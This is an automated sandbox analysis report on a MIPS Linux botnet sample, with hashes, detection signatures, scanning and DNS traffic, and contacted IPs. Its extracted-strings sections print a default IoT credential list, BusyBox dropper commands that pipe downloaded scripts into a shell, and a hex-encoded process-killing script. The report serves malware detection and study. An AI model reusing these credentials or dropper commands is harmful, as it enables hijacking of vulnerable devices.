Linux Analysis Report
la.bot.mips.elf

Overview

General Information

Sample name: la.bot.mips.elf
Analysis ID: 1542969
MD5: b73295ac8c62b1f867bfbb92027b9a40
SHA1: deafe47ed834c33b151a92bfc38456a32cab4282
SHA256: 537d1f23740a645db154814ab733daa957babf9b639a8ee1a33f103094e2e067
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 64
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Sends malformed DNS queries
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: la.bot.mips.elf Avira: detected
Multi AV Scanner detection for submitted file
Source: la.bot.mips.elf ReversingLabs: Detection: 36%
Found strings indicative of a multi-platform dropper
Source: la.bot.mips.elf String: ash|login|wget|curl|tftp|ntpdate|ftp
Source: la.bot.mips.elf String: /proc//exe|ash|login|wget|curl|tftp|ntpdate|ftp/mountinfo/fd/dev/null|/dev/consolesocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin//proc/net/tcp/proc/fd//proc/self/exe/. /proc/
Source: la.bot.mips.elf String: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4

Networking
barindex
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 103.253.147.242 ports 61543,1,3,4,5,6
Sends malformed DNS queries
Source: global traffic DNS traffic detected: malformed DNS query: fortyfivehundred.dyn. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: 75cents.libre. [malformed]
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.13:56696 -> 103.253.147.242:61543
Sample listens on a socket
Source: /tmp/la.bot.mips.elf (PID: 5414) Socket: 127.0.0.1:1234 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 155.243.56.20
Source: unknown TCP traffic detected without corresponding DNS query: 120.38.157.150
Source: unknown TCP traffic detected without corresponding DNS query: 155.243.56.20
Source: unknown TCP traffic detected without corresponding DNS query: 201.22.2.4
Source: unknown TCP traffic detected without corresponding DNS query: 120.38.157.150
Source: unknown TCP traffic detected without corresponding DNS query: 201.22.2.4
Source: unknown TCP traffic detected without corresponding DNS query: 207.81.33.227
Source: unknown TCP traffic detected without corresponding DNS query: 14.29.154.12
Source: unknown TCP traffic detected without corresponding DNS query: 207.81.33.227
Source: unknown TCP traffic detected without corresponding DNS query: 14.29.154.12
Source: unknown TCP traffic detected without corresponding DNS query: 125.208.158.88
Source: unknown TCP traffic detected without corresponding DNS query: 221.44.51.223
Source: unknown TCP traffic detected without corresponding DNS query: 125.208.158.88
Source: unknown TCP traffic detected without corresponding DNS query: 160.9.115.90
Source: unknown TCP traffic detected without corresponding DNS query: 221.44.51.223
Source: unknown TCP traffic detected without corresponding DNS query: 27.162.8.115
Source: unknown TCP traffic detected without corresponding DNS query: 160.9.115.90
Source: unknown TCP traffic detected without corresponding DNS query: 170.58.160.22
Source: unknown TCP traffic detected without corresponding DNS query: 27.162.8.115
Source: unknown TCP traffic detected without corresponding DNS query: 194.167.25.47
Source: unknown TCP traffic detected without corresponding DNS query: 170.58.160.22
Source: unknown TCP traffic detected without corresponding DNS query: 78.163.175.139
Source: unknown TCP traffic detected without corresponding DNS query: 194.167.25.47
Source: unknown TCP traffic detected without corresponding DNS query: 16.37.143.2
Source: unknown TCP traffic detected without corresponding DNS query: 78.163.175.139
Source: unknown TCP traffic detected without corresponding DNS query: 133.9.102.196
Source: unknown TCP traffic detected without corresponding DNS query: 16.37.143.2
Source: unknown TCP traffic detected without corresponding DNS query: 174.245.185.251
Source: unknown TCP traffic detected without corresponding DNS query: 138.103.138.93
Source: unknown TCP traffic detected without corresponding DNS query: 133.9.102.196
Source: unknown TCP traffic detected without corresponding DNS query: 118.244.204.84
Source: unknown TCP traffic detected without corresponding DNS query: 174.245.185.251
Source: unknown TCP traffic detected without corresponding DNS query: 169.100.220.5
Source: unknown TCP traffic detected without corresponding DNS query: 138.103.138.93
Source: unknown TCP traffic detected without corresponding DNS query: 16.157.89.12
Source: unknown TCP traffic detected without corresponding DNS query: 118.244.204.84
Source: unknown TCP traffic detected without corresponding DNS query: 89.101.20.95
Source: unknown TCP traffic detected without corresponding DNS query: 169.100.220.5
Source: unknown TCP traffic detected without corresponding DNS query: 172.0.248.35
Source: unknown TCP traffic detected without corresponding DNS query: 16.157.89.12
Source: unknown TCP traffic detected without corresponding DNS query: 2.111.123.132
Source: unknown TCP traffic detected without corresponding DNS query: 89.101.20.95
Source: unknown TCP traffic detected without corresponding DNS query: 172.95.253.160
Source: unknown TCP traffic detected without corresponding DNS query: 172.0.248.35
Source: unknown TCP traffic detected without corresponding DNS query: 157.136.117.42
Source: unknown TCP traffic detected without corresponding DNS query: 2.111.123.132
Source: unknown TCP traffic detected without corresponding DNS query: 172.95.253.160
Source: unknown TCP traffic detected without corresponding DNS query: 39.116.182.154
Source: unknown TCP traffic detected without corresponding DNS query: 6.125.27.42
Source: unknown TCP traffic detected without corresponding DNS query: 157.136.117.42
Source: global traffic DNS traffic detected: DNS query: fortyfivehundred.dyn. [malformed]
Source: global traffic DNS traffic detected: DNS query: 75cents.libre. [malformed]
Source: global traffic DNS traffic detected: DNS query: nineteen.libre
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: la.bot.mips.elf String found in binary or memory: http:///curl.sh
Source: la.bot.mips.elf String found in binary or memory: http:///wget.sh
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname FICORA
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sample String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep
Source: Initial sample String containing 'busybox' found: (usage: busyboxincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne >> > upnp
Source: Initial sample String containing 'busybox' found: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Sample tries to kill a process (SIGKILL)
Source: /tmp/la.bot.mips.elf (PID: 5416) SIGKILL sent: pid: 936, result: successful Jump to behavior
Source: classification engine Classification label: mal64.troj.linELF@0/0@5/0
Enumerates processes within the "proc" file system
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/230/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/110/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/231/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/111/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/232/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/112/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/233/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/113/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/234/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/114/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/235/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/115/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/236/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/116/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/237/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/117/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/238/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/118/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/239/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/119/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/914/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/10/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/917/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/11/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/12/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/13/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/14/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/15/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/16/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/17/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/18/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/19/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/240/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/120/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/241/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/121/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/242/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/1/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/122/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/243/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/2/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/123/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/244/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/3/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/124/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/245/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/125/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/4/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/246/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/126/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/5/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/247/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/127/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/6/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/248/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/128/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/7/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/249/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/129/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/8/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/800/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/9/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/802/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/803/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/20/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/21/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/22/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/23/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/24/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/25/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/26/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/27/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/28/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/29/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/490/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/250/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/371/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/130/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/251/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/131/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/252/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/132/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/253/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/254/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/134/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/255/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/256/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/257/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/378/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/258/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/259/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/936/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/30/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/816/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/35/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/260/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/261/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/262/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/142/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/263/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/264/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/265/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/145/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/266/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5416) File opened: /proc/267/fd Jump to behavior
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/la.bot.mips.elf (PID: 5414) Queries kernel information via 'uname': Jump to behavior
Source: la.bot.mips.elf, 5414.1.000055c54ef38000.000055c54efdf000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/mips
Source: la.bot.mips.elf, 5414.1.000055c54ef38000.000055c54efdf000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mips
Source: la.bot.mips.elf, 5414.1.00007ffde753a000.00007ffde755b000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/la.bot.mips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/la.bot.mips.elf
Source: la.bot.mips.elf, 5414.1.00007ffde753a000.00007ffde755b000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mips

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
129.224.136.127
 unknown United States
6071 UNISYS-AS-EUS false
15.22.206.24
 unknown United States
13979 ATT-IPFRUS false
115.16.214.50
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
145.29.179.3
 unknown Netherlands
1103 SURFNET-NLSURFnetTheNetherlandsNL false
200.167.97.250
 unknown Brazil
4230 CLAROSABR false
176.17.244.214
 unknown Saudi Arabia
35819 MOBILY-ASEtihadEtisalatCompanyMobilySA false
221.213.227.132
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
135.152.191.186
 unknown United States
14962 NCR-252US false
172.85.78.51
 unknown United States
393968 GOLDKEY-CORPORATIONUS false
180.226.130.168
 unknown Korea Republic of
17858 POWERVIS-AS-KRLGPOWERCOMMKR false
78.255.146.32
 unknown France
12322 PROXADFR false
188.108.213.244
 unknown Germany
3209 VODANETInternationalIP-BackboneofVodafoneDE false
193.70.147.14
 unknown Italy
52030 SERVERPLAN-ASIT false
132.141.112.135
 unknown United States
306 DNIC-ASBLK-00306-00371US false
171.87.219.20
 unknown China
4847 CNIX-APChinaNetworksInter-ExchangeCN false
75.46.47.39
 unknown United States
7018 ATT-INTERNET4US false
31.100.211.66
 unknown United Kingdom
12576 EELtdGB false
133.215.196.170
 unknown Japan 2497 IIJInternetInitiativeJapanIncJP false
122.170.32.51
 unknown India
24560 AIRTELBROADBAND-AS-APBhartiAirtelLtdTelemediaServices false
124.37.105.55
 unknown Japan 17506 UCOMARTERIANetworksCorporationJP false
139.71.144.246
 unknown United States
6307 AMERICAN-EXPRESSUS false
142.165.135.123
 unknown Canada
803 SASKTELCA false
76.110.59.206
 unknown United States
7922 COMCAST-7922US false
112.208.237.145
 unknown Philippines
9299 IPG-AS-APPhilippineLongDistanceTelephoneCompanyPH false
30.147.249.216
 unknown United States
7922 COMCAST-7922US false
203.95.9.219
 unknown Guam
17456 PDSGUAM-USTRANSPORT-AS-GU-APPacificDataSystemsGU false
56.211.181.246
 unknown United States
2686 ATGS-MMD-ASUS false
150.76.43.43
 unknown Japan 6400 CompaniaDominicanadeTelefonosSADO false
79.183.91.146
 unknown Israel
8551 BEZEQ-INTERNATIONAL-ASBezeqintInternetBackboneIL false
119.34.229.66
 unknown China
17622 CNCGROUP-GZChinaUnicomGuangzhounetworkCN false
48.42.138.25
 unknown United States
2686 ATGS-MMD-ASUS false
55.149.38.67
 unknown United States
1541 DNIC-ASBLK-01534-01546US false
157.131.126.175
 unknown United States
46375 AS-SONICTELECOMUS false
123.111.212.155
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR false
65.230.161.209
 unknown United States
701 UUNETUS false
159.23.207.50
 unknown United States
200544 SWISS-DEFENCE-AFCSOCH false
168.246.245.209
 unknown United States
4241 CSFTBUS false
73.240.218.5
 unknown United States
7922 COMCAST-7922US false
7.114.83.168
 unknown United States
3356 LEVEL3US false
78.195.175.88
 unknown France
12322 PROXADFR false
181.22.93.165
 unknown Argentina
22927 TelefonicadeArgentinaAR false
62.104.138.21
 unknown Germany
5430 FREENETDEfreenetDatenkommunikationsGmbHDE false
141.24.246.238
 unknown Germany
680 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese false
125.68.177.74
 unknown China
38283 CHINANET-SCIDC-AS-APCHINANETSiChuanTelecomInternetData false
203.34.197.140
 unknown China
23764 CTGI-CLOUDChinaTelecomGlobalLimitedHK false
92.235.47.246
 unknown Netherlands
6830 LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding false
118.133.160.232
 unknown China
9812 CNNIC-CN-COLNETOrientalCableNetworkCoLtdCN false
143.26.208.116
 unknown United States
264008 LANCAMANTOANISERVICOSDEINFORMATICALTDA-MEBR false
36.2.137.239
 unknown Japan 2519 VECTANTARTERIANetworksCorporationJP false
176.18.146.113
 unknown Saudi Arabia
35819 MOBILY-ASEtihadEtisalatCompanyMobilySA false
32.122.168.243
 unknown United States
7018 ATT-INTERNET4US false
171.61.238.174
 unknown India
24560 AIRTELBROADBAND-AS-APBhartiAirtelLtdTelemediaServices false
73.252.2.62
 unknown United States
7922 COMCAST-7922US false
79.21.61.183
 unknown Italy
3269 ASN-IBSNAZIT false
72.33.238.136
 unknown United States
59 WISC-MADISON-ASUS false
199.152.254.186
 unknown United States
4152 USDA-1US false
74.100.83.40
 unknown United States
5650 FRONTIER-FRTRUS false
1.97.211.62
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
57.253.224.145
 unknown Belgium
2686 ATGS-MMD-ASUS false
29.248.97.179
 unknown United States
7922 COMCAST-7922US false
155.54.176.122
 unknown Spain
766 REDIRISRedIRISAutonomousSystemES false
167.5.230.253
 unknown United States
51964 ORANGE-BUSINESS-SERVICES-IPSN-ASNFR false
158.165.54.82
 unknown United States
6377 4JNETUS false
142.95.154.183
 unknown Canada
393952 GOANETCA false
89.53.55.160
 unknown Germany
5430 FREENETDEfreenetDatenkommunikationsGmbHDE false
159.118.40.151
 unknown United States
11492 CABLEONEUS false
31.156.226.22
 unknown Italy
30722 VODAFONE-IT-ASNIT false
160.87.238.63
 unknown United States
299 UCINET-ASUS false
75.8.10.238
 unknown United States
7018 ATT-INTERNET4US false
223.188.245.165
 unknown India
45609 BHARTI-MOBILITY-AS-APBhartiAirtelLtdASforGPRSService false
136.115.23.109
 unknown United States
15169 GOOGLEUS false
13.136.9.106
 unknown United States
7018 ATT-INTERNET4US false
159.211.203.2
 unknown Japan 131090 CAT-IDC-4BYTENET-AS-APCATTELECOMPublicCompanyLtdCATT false
30.198.102.134
 unknown United States
7922 COMCAST-7922US false
184.191.124.54
 unknown United States
22773 ASN-CXA-ALL-CCI-22773-RDCUS false
193.252.133.111
 unknown France
8891 FTBGPDMFR false
217.163.2.100
 unknown United Kingdom
3356 LEVEL3US false
189.149.54.2
 unknown Mexico
8151 UninetSAdeCVMX false
79.92.191.161
 unknown France
15557 LDCOMNETFR false
189.154.92.158
 unknown Mexico
8151 UninetSAdeCVMX false
134.185.188.240
 unknown United States
2611 BELNETBE false
44.130.45.66
 unknown United States
7377 UCSDUS false
137.34.18.115
 unknown Switzerland
721 DNIC-ASBLK-00721-00726US false
56.137.166.170
 unknown United States
2686 ATGS-MMD-ASUS false
198.93.140.164
 unknown United States
3356 LEVEL3US false
200.138.29.105
 unknown Brazil
8167 BrasilTelecomSA-FilialDistritoFederalBR false
